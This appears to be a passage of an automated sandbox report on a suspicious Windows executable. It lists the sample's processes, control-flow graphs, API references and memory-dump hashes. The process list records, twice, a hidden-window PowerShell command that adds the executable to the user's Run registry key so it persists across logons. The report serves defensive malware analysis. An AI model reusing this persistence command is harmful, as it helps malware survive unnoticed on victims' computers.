                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:low
                                    Has exited:false

                                    Target ID:4
                                    Start time:11:02:30
                                    Start date:01/01/2025
                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):true
                                    Commandline:powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Users\user\Desktop\lDO4WBEQyL.exe\" }"
                                    Imagebase:0x380000
                                    File size:433'152 bytes
                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:5
                                    Start time:11:02:30
                                    Start date:01/01/2025
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff6d64d0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:6
                                    Start time:11:02:42
                                    Start date:01/01/2025
                                    Path:C:\Users\user\Desktop\lDO4WBEQyL.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\lDO4WBEQyL.exe"
                                    Imagebase:0xf80000
                                    File size:8'812'032 bytes
                                    MD5 hash:43142552E4812E3337226CA1664ED728
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:low
                                    Has exited:false

                                    Target ID:7
                                    Start time:11:02:50
                                    Start date:01/01/2025
                                    Path:C:\Users\user\Desktop\lDO4WBEQyL.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\lDO4WBEQyL.exe"
                                    Imagebase:0xf80000
                                    File size:8'812'032 bytes
                                    MD5 hash:43142552E4812E3337226CA1664ED728
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:low
                                    Has exited:false

                                    Target ID:8
                                    Start time:11:04:09
                                    Start date:01/01/2025
                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):true
                                    Commandline:powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Users\user\Desktop\lDO4WBEQyL.exe\" }"
                                    Imagebase:0x380000
                                    File size:433'152 bytes
                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:false

                                    Target ID:9
                                    Start time:11:04:09
                                    Start date:01/01/2025
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff6d64d0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:false


                                      Execution Graph

                                      Execution Coverage:0.2%
                                      Dynamic/Decrypted Code Coverage:0%
                                      Signature Coverage:12.5%
                                      Total number of Nodes:8
                                      Total number of Limit Nodes:0

                                      Callgraph

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      Control-flow graph of the function at 0xfb75f0 (rendered as a graph image in the original report; each basic block is listed by node id with its address range, the functions it calls, and its successor edges):
                                      • 2: fb75f0-fb765a, calls fe7200, fb7590, fb7f30 → 9, 10
                                      • 9: fb778d-fb7794 → 11, 12
                                      • 10: fb7660-fb768a → 15, 16
                                      • 11: fb77b3-fb77b9 → 17, 18
                                      • 12: fb7796-fb77af, calls fb7f10 → 11
                                      • 15: fb778b → 11
                                      • 16: fb7690-fb76b3 → 20, 21
                                      • 17: fb77cb-fb77d1 (no successor edges)
                                      • 18: fb77bb-fb77c8, calls fb7590 → 17
                                      • 20: fb76b9-fb76cf, calls fb7eb0 → 26, 27
                                      • 21: fb7786 → 15
                                      • 26: fb76e2-fb76e6 → 21, 28
                                      • 27: fb76d1-fb76d8 → 15
                                      • 28: fb76ec-fb76f5 → 29, 30
                                      • 29: fb772f-fb7746, calls fb7ef0 → 35, 36
                                      • 30: fb76f7-fb76fe → 29, 31
                                      • 31: fb7700-fb770f, calls fe6900 → 29, 40
                                      • 35: fb7748-fb775a, calls fb7f10 → 36
                                      • 36: fb775f-fb7781, calls fb7590, fb7ed0 → 21
                                      • 40: fb7711-fb772c → 29
                                      APIs
                                      • _ValidateLocalCookies.LIBCMTD ref: 00FB763D
                                      • ___except_validate_context_record.LIBVCRUNTIMED ref: 00FB7649
                                        • Part of subcall function 00FB7F30: __guard_icall_checks_enforced.LIBCMTD ref: 00FB7F36
                                      • __IsNonwritableInCurrentImage.LIBCMTD ref: 00FB7705
                                      • _ValidateLocalCookies.LIBCMTD ref: 00FB7770
                                      • _ValidateLocalCookies.LIBCMTD ref: 00FB77C3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3892170315.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                      • Associated: 00000000.00000002.3892145170.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3892223380.0000000000FE8000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3892249241.0000000000FF8000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3892279336.0000000000FFA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3892279336.00000000015DE000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3893155356.00000000017D3000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f80000_lDO4WBEQyL.jbxd
                                      Similarity
                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record__guard_icall_checks_enforced
                                      • String ID: csm
                                      • API String ID: 3439031638-1018135373
                                      • Opcode ID: 7700004d401bc58c1093de646d3ccb7ecb7a888f0a4c5c90d6b81c62bd609edb
                                      • Instruction ID: 3d2bb04ed07324369c961641135a7ff5d47e29d20eef1e11b940c22da20220e2
                                      • Opcode Fuzzy Hash: 7700004d401bc58c1093de646d3ccb7ecb7a888f0a4c5c90d6b81c62bd609edb
                                      • Instruction Fuzzy Hash: F3510E74D042099FCB04EF95D881AEEBBB1BF88314F248158E5156B351DB35AA41DFA1
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.2943057437.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_2d50000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e5a5e9f5b8a3006978ef3d722c81c7dc46a6bb61797add54526740ca26f114f2
                                      • Instruction ID: 6bc4d7745719c53feca5ebf7f1dc5de9156b13e4441b1ecae5dc074b0afe6169
                                      • Opcode Fuzzy Hash: e5a5e9f5b8a3006978ef3d722c81c7dc46a6bb61797add54526740ca26f114f2
                                      • Instruction Fuzzy Hash: 4D210835B001549FDB08DFA9D58099DFBF2AF88310B25C1A5E905AB365CB35ED45CB90
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.2943057437.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_2d50000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3783176cd9af1c88bcf7ad3b230fda15833ec2c39f54815a5e04f14e33de5fd3
                                      • Instruction ID: d56920caa5c7d02e920022ad3cf4653d77f835be2efcb8d73a1ab875a48f05dc
                                      • Opcode Fuzzy Hash: 3783176cd9af1c88bcf7ad3b230fda15833ec2c39f54815a5e04f14e33de5fd3
                                      • Instruction Fuzzy Hash: 29B1AE34A052549FCB15CFA8D484AAEFBF6FF89310F1484A9E8459B362C775ED41CBA0
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.2943057437.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_2d50000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c01bb13920e502fae359d30f4aceb49b253685b0e723537759acd9bc9037660f
                                      • Instruction ID: 39ff9d2ad0db2929968b0568d6f9bf926ac158c5c3314e0b9b0ccb38e10570d9
                                      • Opcode Fuzzy Hash: c01bb13920e502fae359d30f4aceb49b253685b0e723537759acd9bc9037660f
                                      • Instruction Fuzzy Hash: 10916A70A006199FCB05CF58C594AAEFBF1FF88314B25865AD855AB3A5C732FC51CBA0
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.2943057437.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_2d50000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 56bbe9c1be7c43e193e83d7cc5d44aed799e7b7b4ff8f4bebe8f0d39c33d523b
                                      • Instruction ID: 0d7319f0eb76e25b582b3ea27a1a6ca2375e6086c990fc1db4a253dd3f836c2e
                                      • Opcode Fuzzy Hash: 56bbe9c1be7c43e193e83d7cc5d44aed799e7b7b4ff8f4bebe8f0d39c33d523b
                                      • Instruction Fuzzy Hash: 9A411574A005199FCB09CF58C598ABAFBB1FF48314B11825ADC16AB365C732FC91CBA4
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.2943057437.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_2d50000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 642e0f85c58fa1180c7bee94bd5039223e44c2d45146ef2fde71f62f08ecb6e5
                                      • Instruction ID: b6db3488473a3704d9dc42b895f1595398d4bf67ca5995f58d9d816c93e1662e
                                      • Opcode Fuzzy Hash: 642e0f85c58fa1180c7bee94bd5039223e44c2d45146ef2fde71f62f08ecb6e5
                                      • Instruction Fuzzy Hash: FB11E275A006189FDB04CFA9E68099DFBF6FF88710F2581A5E808AB315C735ED85CB90
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.2942718506.0000000002AFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AFD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_2afd000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0381a07c885ebd7ea66c384f171dc84fcf1a991f3e91943d4a124884ed6b3334
                                      • Instruction ID: 1d379f9794bb278b998d3652fc6165860c26491375ba5d86335f999ba7ba8971
                                      • Opcode Fuzzy Hash: 0381a07c885ebd7ea66c384f171dc84fcf1a991f3e91943d4a124884ed6b3334
                                      • Instruction Fuzzy Hash: 9301407100E7C49ED7138B258894752BFB4DF47224F1D80DBE9888F5A3C2695849C772
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.2942718506.0000000002AFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AFD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_2afd000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5e5b3aa4461d5a79094fb0da2a2498cee3b7e7ac9b31d2161e210001749c6c83
                                      • Instruction ID: 12e80c7fe2c77a91648b2a849c111c0b9f293bff768745111378b893a2d34d86
                                      • Opcode Fuzzy Hash: 5e5b3aa4461d5a79094fb0da2a2498cee3b7e7ac9b31d2161e210001749c6c83
                                      • Instruction Fuzzy Hash: 05012B71005B049AD7618B55CDC4B67BFDCEF46364F18C42AFE4A0B646CB7D9841C6B1

                                      Execution Graph

                                      Execution Coverage:0.2%
                                      Dynamic/Decrypted Code Coverage:0%
                                      Signature Coverage:0%
                                      Total number of Nodes:8
                                      Total number of Limit Nodes:0

                                      Callgraph

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      Control-flow graph of the function at 0xfb75f0 (rendered as a graph image in the original report; each basic block is listed by node id with its address range, the functions it calls, and its successor edges):
                                      • 2: fb75f0-fb765a, calls fe7200, fb7590, fb7f30 → 9, 10
                                      • 9: fb778d-fb7794 → 11, 12
                                      • 10: fb7660-fb768a → 15, 16
                                      • 11: fb77b3-fb77b9 → 17, 18
                                      • 12: fb7796-fb77af, calls fb7f10 → 11
                                      • 15: fb778b → 11
                                      • 16: fb7690-fb76b3 → 21, 22
                                      • 17: fb77cb-fb77d1 (no successor edges)
                                      • 18: fb77bb-fb77c8, calls fb7590 → 17
                                      • 21: fb76b9-fb76cf, calls fb7eb0 → 26, 27
                                      • 22: fb7786 → 15
                                      • 26: fb76e2-fb76e6 → 22, 28
                                      • 27: fb76d1-fb76d8 → 15
                                      • 28: fb76ec-fb76f5 → 29, 30
                                      • 29: fb772f-fb7746, calls fb7ef0 → 35, 36
                                      • 30: fb76f7-fb76fe → 29, 31
                                      • 31: fb7700-fb770f, calls fe6900 → 29, 40
                                      • 35: fb7748-fb775a, calls fb7f10 → 36
                                      • 36: fb775f-fb7781, calls fb7590, fb7ed0 → 22
                                      • 40: fb7711-fb772c → 29
                                      APIs
                                      • _ValidateLocalCookies.LIBCMTD ref: 00FB763D
                                      • ___except_validate_context_record.LIBVCRUNTIMED ref: 00FB7649
                                        • Part of subcall function 00FB7F30: __guard_icall_checks_enforced.LIBCMTD ref: 00FB7F36
                                      • __IsNonwritableInCurrentImage.LIBCMTD ref: 00FB7705
                                      • _ValidateLocalCookies.LIBCMTD ref: 00FB7770
                                      • _ValidateLocalCookies.LIBCMTD ref: 00FB77C3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3891792398.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                      • Associated: 00000006.00000002.3891757746.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000006.00000002.3891876839.0000000000FE8000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000006.00000002.3891922729.0000000000FF8000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000006.00000002.3891955963.0000000000FFA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000006.00000002.3891955963.00000000015DE000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000006.00000002.3892741493.00000000017D3000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_f80000_lDO4WBEQyL.jbxd
                                      Similarity
                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record__guard_icall_checks_enforced
                                      • String ID: csm
                                      • API String ID: 3439031638-1018135373
                                      • Opcode ID: 7700004d401bc58c1093de646d3ccb7ecb7a888f0a4c5c90d6b81c62bd609edb
                                      • Instruction ID: 3d2bb04ed07324369c961641135a7ff5d47e29d20eef1e11b940c22da20220e2
                                      • Opcode Fuzzy Hash: 7700004d401bc58c1093de646d3ccb7ecb7a888f0a4c5c90d6b81c62bd609edb
                                      • Instruction Fuzzy Hash: F3510E74D042099FCB04EF95D881AEEBBB1BF88314F248158E5156B351DB35AA41DFA1

                                      Execution Graph

                                      Execution Coverage:0.5%
                                      Dynamic/Decrypted Code Coverage:0%
                                      Signature Coverage:0%
                                      Total number of Nodes:8
                                      Total number of Limit Nodes:0

                                      Callgraph

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      Control-flow graph of the function at 0xfb75f0 (rendered as a graph image in the original report; each basic block is listed by node id with its address range, the functions it calls, and its successor edges):
                                      • 2: fb75f0-fb765a, calls fe7200, fb7590, fb7f30 → 9, 10
                                      • 9: fb778d-fb7794 → 11, 12
                                      • 10: fb7660-fb768a → 15, 16
                                      • 11: fb77b3-fb77b9 → 17, 18
                                      • 12: fb7796-fb77af, calls fb7f10 → 11
                                      • 15: fb778b → 11
                                      • 16: fb7690-fb76b3 → 20, 21
                                      • 17: fb77cb-fb77d1 (no successor edges)
                                      • 18: fb77bb-fb77c8, calls fb7590 → 17
                                      • 20: fb76b9-fb76cf, calls fb7eb0 → 26, 27
                                      • 21: fb7786 → 15
                                      • 26: fb76e2-fb76e6 → 21, 28
                                      • 27: fb76d1-fb76d8 → 15
                                      • 28: fb76ec-fb76f5 → 29, 30
                                      • 29: fb772f-fb7746, calls fb7ef0 → 36, 37
                                      • 30: fb76f7-fb76fe → 29, 31
                                      • 31: fb7700-fb770f, calls fe6900 → 29, 38
                                      • 36: fb7748-fb775a, calls fb7f10 → 37
                                      • 37: fb775f-fb7781, calls fb7590, fb7ed0 → 21
                                      • 38: fb7711-fb772c → 29
                                      APIs
                                      • _ValidateLocalCookies.LIBCMTD ref: 00FB763D
                                      • ___except_validate_context_record.LIBVCRUNTIMED ref: 00FB7649
                                        • Part of subcall function 00FB7F30: __guard_icall_checks_enforced.LIBCMTD ref: 00FB7F36
                                      • __IsNonwritableInCurrentImage.LIBCMTD ref: 00FB7705
                                      • _ValidateLocalCookies.LIBCMTD ref: 00FB7770
                                      • _ValidateLocalCookies.LIBCMTD ref: 00FB77C3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.3891582007.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                      • Associated: 00000007.00000002.3891554049.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000007.00000002.3891662053.0000000000FE8000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000007.00000002.3891694965.0000000000FF8000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000007.00000002.3891720507.0000000000FFA000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000007.00000002.3892469331.00000000017D0000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000007.00000002.3892486429.00000000017D3000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_f80000_lDO4WBEQyL.jbxd
                                      Similarity
                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record__guard_icall_checks_enforced
                                      • String ID: csm
                                      • API String ID: 3439031638-1018135373
                                      • Opcode ID: 7700004d401bc58c1093de646d3ccb7ecb7a888f0a4c5c90d6b81c62bd609edb
                                      • Instruction ID: 3d2bb04ed07324369c961641135a7ff5d47e29d20eef1e11b940c22da20220e2
                                      • Opcode Fuzzy Hash: 7700004d401bc58c1093de646d3ccb7ecb7a888f0a4c5c90d6b81c62bd609edb
                                      • Instruction Fuzzy Hash: F3510E74D042099FCB04EF95D881AEEBBB1BF88314F248158E5156B351DB35AA41DFA1